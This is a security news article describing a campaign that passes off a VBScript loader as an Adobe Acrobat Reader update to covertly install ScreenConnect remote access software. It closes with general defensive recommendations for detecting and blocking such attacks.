A newly identified cyber attack is deceiving users into downloading remote access software disguised as an Adobe Acrobat Reader update. This sophisticated campaign employs in-memory execution and other advanced techniques to install ConnectWise’s ScreenConnect tool without leaving clear signs on the victim’s computer.
Trust Exploitation in Software Downloads
The attackers capitalize on the trust users place in reputable software brands like Adobe. When users encounter a familiar download button, they often proceed without hesitation. This campaign takes advantage of that trust by delivering a fake installer that actually pushes a heavily obfuscated VBScript file named Acrobat_Reader_V112_6971.vbs.
Researchers from Zscaler ThreatLabz first uncovered this campaign in February 2026, tracing the attack from its initial lure to the final deployment of ScreenConnect. Analyst Kaivalya Khursale noted the use of multiple obfuscation layers and direct in-memory execution, which complicates detection and forensic analysis.
Details of the Attack Strategy
This campaign is notable for using a legitimate remote monitoring and management (RMM) tool. Although ScreenConnect is a legitimate tool used by IT professionals, when installed without the user’s consent, it grants attackers full remote control over the compromised machine.
The fraudulent website hosting this attack mimics Adobe’s official site, initiating an automatic download upon visit. The initial VBScript loader, once activated, operates almost entirely in memory to avoid leaving forensic evidence.
In a carefully orchestrated sequence, the attack begins with the VBScript file that resists analysis by dynamically constructing system object references. The loader then executes commands silently, using PowerShell to download additional files and execute them entirely in-memory.
Countermeasures and Recommendations
The security community recommends avoiding software downloads from unofficial sources, even if they appear legitimate. Organizations should use application whitelisting to block unauthorized RMM tools and monitor for unusual PowerShell activity with ExecutionPolicy Bypass flags.
Security teams are advised to alert on unexpected MSI installations and block access to untrusted file-hosting URLs initiated by scripts. Enhanced EDR solutions should be enabled to detect Process Environment Block (PEB) manipulation and COM-based UAC bypass activities.
In conclusion, while the use of legitimate tools like ScreenConnect makes detection challenging, awareness and proactive security measures can mitigate the risks associated with such deceptive campaigns.
